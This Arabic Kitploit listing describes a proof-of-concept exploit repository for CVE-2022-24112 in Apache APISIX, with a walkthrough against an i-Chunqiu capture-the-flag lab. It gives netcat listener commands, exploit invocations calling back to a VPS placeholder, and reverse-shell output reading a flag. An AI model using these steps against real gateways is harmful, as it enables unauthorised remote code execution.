Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-24112_POC — CVE-2022-24112_POC | Kitploit
أدوات/GitHubGitHub/acczdy/cve-2022-24112_poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرأمن واجهات برمجة التطبيقات
GitHubacczdy/cve-2022-24112_poc

CVE-2022-24112_POC

CVE-2022-24112_POC

عرض المستودع
51منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

POC

POC تم جمعها

CVE-2022-24112

لتوفير بيئة اختبار لسحابة Chunqiu: CVE-2022-24112، تم تعديل اثنين من POC، مع تعديل طفيف لـ POC الخاص بـ M4xSec و twseptian لتتناسب مع بيئة السحابة:


سحابة Chunqiu: CVE-2022-24112:

Apache Apisix هي خدمة بوابة API ميكروخدمات سحابية تابعة لمؤسسة Apache (الولايات المتحدة). يعتمد البرنامج على OpenResty و etcd لتحقيق التوجيه الديناميكي والتحميل الساخن للمكونات الإضافية، وهو مناسب لإدارة API ضمن بنية الميكروخدمات. يوجد ثغرة في تنفيذ الأكواد عن بُعد في Apache APISIX، وتعود هذه الثغرة إلى أن المكون الإضافي batch-requests لم يقم بتقييد طلبات المعالجة الدفعية للمستخدمين بشكل فعال. يمكن للمهاجم تجاوز قيود IP لواجهة برمجة التطبيقات (Admin API) من خلال هذه الثغرة، مما قد يؤدي إلى تنفيذ أكواد عن بُعد.


POC الأصلي:

  1. M4xSec: https://github.com/M4xSec/Apache-APISIX-CVE-2022-24112/blob/main/apisix-exploit.py

  2. twseptian: https://github.com/twseptian/cve-2022-24112/blob/main/poc/poc2.py

POC المعدّل هما اللذان كتبتهما أعلاه، ويستهدفان بيئات Linux وWindows على التوالي:


CVE-2022-24112_Linux_by_twseptian.py

  1. تشغيل الاستماع على VPS: nc -lvvp 18888

  2. الدخول إلى دليل POC وتشغيل:

    ملاحظة: عند إضافة البيانات باستخدام -t، لا حاجة لكتابة http:// أو https://، فقط النطاق والمنفذ، كما يلي:

    root@kitploit:~
    python3 CVE-2022-24112_Linux_by_twseptian.py -t eci-eninecsteC2zon6q0xod9n5r7me4ih.cloudeci1.ichunqiu.com:9080 -L VPS_IP -P VPS_PODRPODR
    
  3. العودة لفحص حالة VPS كما يلي:

    root@kitploit:~
    [root@root ~]# nc -lvvp 18888
    Ncat: Version 7.50 ( https://nmap.org/ncat )
    Ncat: Listening on :::18888
    Ncat: Listening on 0.0.0.0:18888
    Ncat: Connection from x.x.x.x.
    Ncat: Connection from x.x.x.x:x.
    id
    uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
    cat /flag
    flag{0834f79f-5f40-4389-bce7-c64e969734c4}
    

CVE-2022-24112_Windows_by_M4xSec.py

  1. تشغيل الاستماع على VPS: nc -lvvp 18888

  2. الدخول إلى دليل POC وتشغيل:

    ملاحظة: عند إضافة البيانات باستخدام -t، لا حاجة لكتابة http:// أو https://، فقط النطاق والمنفذ، كما يلي:

    root@kitploit:~
    python3 CVE-2022-24112_Windows_by_M4xSec.py eci-eninecsteC2zon6q0xod9n5r7me4ih.cloudeci1.ichunqiu.com:9080 VPS_IP VPS_PODRPODR
    
  3. العودة لفحص حالة VPS كما يلي:

    root@kitploit:~
    [root@root ~]# nc -lvvp 18888
    Ncat: Version 7.50 ( https://nmap.org/ncat )
    Ncat: Listening on :::18888
    Ncat: Listening on 0.0.0.0:18888
    Ncat: Connection from x.x.x.x.
    Ncat: Connection from x.x.x.x:x.
    id
    uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
    cat /flag
    flag{0834f79f-5f40-4389-bce7-c64e969734c4}
    
تنزيل الأداة